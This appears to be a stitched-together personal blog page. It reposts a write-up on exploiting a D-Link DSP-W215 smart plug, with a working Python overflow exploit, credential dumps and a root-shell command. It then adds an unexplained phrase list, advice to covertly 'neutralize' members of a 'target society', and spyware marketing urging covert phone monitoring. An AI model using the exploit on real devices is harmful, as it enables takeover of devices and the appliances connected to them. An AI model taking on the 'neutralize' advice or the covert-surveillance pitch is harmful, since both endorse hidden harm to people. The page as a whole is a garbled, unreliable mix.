Hell is eternal, hell is eternal, hell is eternal…
sousveillance
Hacking the D-Link DSP-W215 Smart Plug
http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/
The D-Link DSP-W215 Smart Plug is a wireless home automation device for monitoring and controlling electrical outlets. It isn’t readily available from Amazon or Best Buy yet, but the firmware is up on D-Link’s web site.
TL;DR, the DSP-W215 contains an unauthenticated stack overflow that can be exploited to take complete control of the device, and anything connected to its AC outlet.
The DSP-W215 firmware contains all the usual stuff you would expect from a Linux-based device:
After unpacking and examining the contents of the file system, I found that the smart plug doesn’t have a normal web-based interface; you are expected to configure it using D-Link’s Android/iOS app. The apps however, appear to use the Home Network Administration Protocol (HNAP) to talk to the smart plug.
Being a SOAP-based protocol, HNAP is served up by a lighttpd server running on the smart plug, and the following excerpt from the lighttpd configuration file(s) shows that HNAP requests are passed off to the /www/my_cgi.cgi binary for processing:
|
1
2
3
4
5
6
|
...alias.url += ( "/HNAP1/" => "/www/my_cgi.cgi", "/HNAP1" => "/www/my_cgi.cgi",... |
While HNAP is an authenticated protocol, some HNAP actions – specifically the GetDeviceSettings action – do not require authentication:
GetDeviceSettings only provides a list of supported actions and isn’t of much use by itself, but this does mean that my_cgi.cgi has to parse the request prior to checking for authentication.
HNAP request data is handled by the do_hnap function in my_cgi.cgi. Since HNAP actions are sent as HTTP POST requests, do_hnap first processes the Content-Length header specified in the POST request:
Then, naturally, it reads content_length bytes into a fixed-size stack buffer:
The following C code is perhaps a bit clearer:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
int content_length, i;char *content_length_str;char post_data_buf[500000];content_length = 0;content_length_str = getenv("CONTENT_LENGTH");if(content_length_str){ content_length = strtol(content_length_str, 10);}memset(post_data_buf, 0, 500000);for(i=0; i<content_length; i++){ post_data_buf[i] = fgetc();} |
From the memset it is obvious that the post_data_buf stack buffer is only intended to hold up to 500,000 bytes. Since the Content-Length header is trusted blindly, POSTing more than 500,000 bytes will overflow this buffer, but there are quite a few more variables on the stack; it takes 1,000,020 bytes to overwrite everything on the stack up to the saved return address:
|
1
2
3
|
# Overflow $ra with 0x41414141perl -e 'print "D"x1000020; print "A"x4' > overflow.txtwget --post-file=overflow.txt http://192.168.0.60/HNAP1/ |
What’s more, because the POST data is read into the buffer with an fgetc loop, there are no bad bytes – even NULL bytes are allowed. That’s nice, because at 0x00405CAC in my_cgi.cgi there is this little bit of code that loads $a0 (the first function argument register) with a pointer to the stack ($sp+0×28) and calls system():
We just need to overwrite the saved return address with 0x00405CAC and put whatever command we want to run onto the stack at offset 0×28:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
import sysimport urllib2command = sys.argv[1]buf = "D" * 1000020 # Fill up the stack bufferbuf += "\x00\x40\x5C\xAC" # Overwrite the return address on the stackbuf += "E" * 0x28 # Stack fillerbuf += command # Command to executebuf += "\x00" # NULL terminate the command stringprint urllib2.urlopen(req).read() |
Even better, the stdout of any command we execute is returned in the server’s response:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
eve@eve:~$ ./exploit.py 'ls -l /'drwxr-xr-x 2 1000 1000 4096 Jan 14 14:16 bindrwxrwxr-x 3 1000 1000 4096 May 9 16:04 devdrwxrwxr-x 3 1000 1000 4096 Sep 3 2010 etcdrwxrwxr-x 3 1000 1000 4096 Jan 14 14:16 libdrwxr-xr-x 3 1000 1000 4096 Jan 14 14:16 libexeclrwxrwxrwx 1 1000 1000 11 May 9 16:01 linuxrc -> bin/busyboxdrwxrwxr-x 2 1000 1000 4096 Nov 11 2008 lost+founddrwxrwxr-x 7 1000 1000 4096 May 9 15:44 mntdrwxr-xr-x 2 1000 1000 4096 Jan 14 14:16 mydlinkdrwxrwxr-x 2 1000 1000 4096 Nov 11 2008 procdrwxrwxr-x 2 1000 1000 4096 May 9 17:49 rootdrwxr-xr-x 2 1000 1000 4096 Jan 14 14:16 sbindrwxrwxr-x 3 1000 1000 4096 May 15 04:27 tmpdrwxrwxr-x 7 1000 1000 4096 Jan 14 14:16 usrdrwxrwxr-x 3 1000 1000 4096 May 9 16:04 var-rw-r--r-- 1 1000 1000 17 Jan 14 14:16 versiondrwxrwxr-x 8 1000 1000 4096 May 9 16:52 www |
We can dump configuration settings and admin creds:
|
1
2
3
4
5
6
|
eve@eve:~$ ./exploit.py 'nvram show' | grep adminadmin_user_pwd=200416admin_user_tbl=0/admin_user_name/admin_user_pwd/admin_leveladmin_level=1admin_user_name=adminstorage_user_00=0/admin// |
Or start up a telnet server to get a proper root shell:
|
1
2
3
4
5
6
7
8
9
10
11
|
eve@eve:~$ ./exploit.py 'busybox telnetd -l /bin/sh'eve@eve:~$ telnet 192.168.0.60Trying 192.168.0.60...Connected to 192.168.0.60.Escape character is '^]'.BusyBox v1.01 (2014.01.14-12:12+0000) Built-in shell (ash)Enter 'help' for a list of built-in commands./ # |
After reversing a bit more of my_cgi.cgi, I found that all you need to do to turn the wall outlet on and off is execute /var/sbin/relay:
|
1
2
|
/var/sbin/relay 1 # Turns outlet on/var/sbin/relay 0 # Turns outlet off |
You can run a little script on the smart plug to play blinkenlights:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
#!/bin/shOOK=1while [ 1 ]do /var/bin/relay $OOK if [ $OOK -eq 1 ] then OOK=0 else OOK=1 fidone |
Controlling a wall outlet can have more serious implications however, as exemplified the following D-Link advertisement:
While the smart plug may be able detect overheating, I suspect that it can only detect if the smart plug itself is overheating – it has no way to monitor the actual temperature of any devices plugged into the wall outlet. So, if you’ve left a space heater plugged in to the outlet and some nefarious person surreptitiously turns the outlet back on, you’re in for a bad day.
It’s unclear if the smart plug attempts to make itself remotely accessible (using UPnP port forwarding rules, for example), as the Android configuration app simply doesn’t work. It couldn’t even establish an initial connection to the smart plug, although my laptop had no problems. When it finally did, it refused to create a MyDlink account for remote access, with the very helpful error message “could not create account”. Although it said it had configured the smart plug to connect to my wireless network, the smart plug did not connect to my network, and it ceased to present itself as an access point for initial configuration. With the wireless borked and no ethernet connection, I was left with no means to further communicate with it. Oh, and there’s no hard reset button either. Ah well, it’s going in the bin anyway.
I suspect that anyone else who has purchased this device hasn’t been able to get it to work either, which is probably a good thing. At any rate, I’d be wary of connecting such a device to either my network or my appliances.
Incidentally, D-Link’s DIR-505L travel router is also affected by this bug, as it has a nearly identical my_cgi.cgi binary.
PoC code for both devices can be found here.
Akurt
Sharpan tul? – just another way of saying ‘Fekas?’
Yutlab? – asked when the person has had some tough experience recently and you want to ask politely if they’re OK.
Chesh, …! Atraduk? – this is a very informal way of greeting a close friend or anyone who you see on a regular basis and you want to ask has anything happened since you last met.
Chesh, …! Sharpuk? – the same as above with a difference that you’re probably not that interested in what news the other person might have.
Chesh, …! Thillak ekta! – used when you haven’t seen the person for a long period of time and you want to state that fact in the greeting.
Chesh, …! Kurtapan? – just a standard enquiry with little or no direct meaning.
Yorpathil…? – a typical way of asking something that might be a slightly personal question.
Ladukuth… – a very handy way to start making your point if you’re not sure how to begin the sentence.
Comment: Courtesy to Robby Kukurs for collecting these common phrases.
How to deal with enemies…
Create a conlang with a few trusted friends. Or learn languages with a few trusted friends. Do not tell others that you know these languages. Analyse target society. Discretely neutralize the worst elements.
Do not run around and yell and scream that the WHOLE target society sucks. Not even on teh interwebs. That is spreading HATE and hate has consequences, as we all know well.
That is how Antifa does it:
1) A group of people learns languages in public education (learning their own languages at home or at specialized schools)
2) Analyses outsider society
3) Discretely neutralizes the worst outsiders (i.e. “fascists”)
Anything else will result in Epic Fail.
Final note:
Hell is eternal. Only my religion allows euthanasia. Abortion and pornography can only be allowed if euthanasia is allowed as well.
If you’re not Spying, you are not a Good Parent
http://www.track-phone.net/monitor/cell-phone-spy/if-youre-not-spying-you-are-not-a-good-parent-7/
What is a tracking and monitoring software program? What is a keystroke logger? What’s a computer spy application? Keylogger ,application or perhaps easier phrases, laptop or computer keeping track of software is a type of personal computer system that lets you bear in mind and responsible of every thing happening on a sponsor personal computer. A simple keylogger will be only logging most of the key strokes that are tapped out into a pc. Of course monitoring and tracking of devices for family and business safety should include personal computers, phones and tablets. Spy Software (not bad) and Spyware (bad) are not really the same thing. Spyware is a broad type of possibly malicious software that may embed itself on mobile phones, usually coming over the internet. Monitoring software is a standard term for the various kinds of programs that are available to be able to record computer or smartphone activity. Spy is not a bad word. Spy software packages are a phrase usually employed to explain malevolent software program or even a expression incorrectly connected with a keylogger. Software shown here is a lot more than this and should not be placed in the identical class. Spyware coders use many methods to program spy phone software applications. Many people may use spy in terms when they refer to legitimate monitoring of mobile phones. There are plenty of permissible reasons to Track cell-phone and communications content. Not only is Parental Monitoring allowed, and Employee Monitoring allowed, they are required. If not legally, then morally and ethically; for the reason that parents and employers are empowered to moderate tragedy and liability that originate from cell phone misuse or the need for protection. Authority comes with responsibility. On the plus side there’s something to keep in mind is usually that spy phone programs need agreement. A number of spyphone software programs might be delivered to the device remotely, but cannot be installed or activated. Employee Monitoring obligation goes beyond productivity and policy compliance; defending against insider threats as well as other improper use is very important and Cyber Bullies and Sexual Harassment continue to be serious problems for companies. Companies, Parents and just about anyone rely on cell phone spy phone software programs to get a handle on lost data, when in case their phones are lost or stolen. Parental responsibly means being aware of where kids are and what they are doing with their cell phones and personal computers. To Monitor Youth Mobile phone Usage: Parents and guardians use mobile phone spy software programs to get a handle on distracted drivers, sexting, predators, excessive use. The FBI publication, A Parents Guide to Internet Safety, reminds everyone of the value of monitoring and indicates that it may be exercised unobtrusively. This relates to both computers and smartphones.
Comment: Very interesting resource. Sousveillance, any takers?
oogenhand 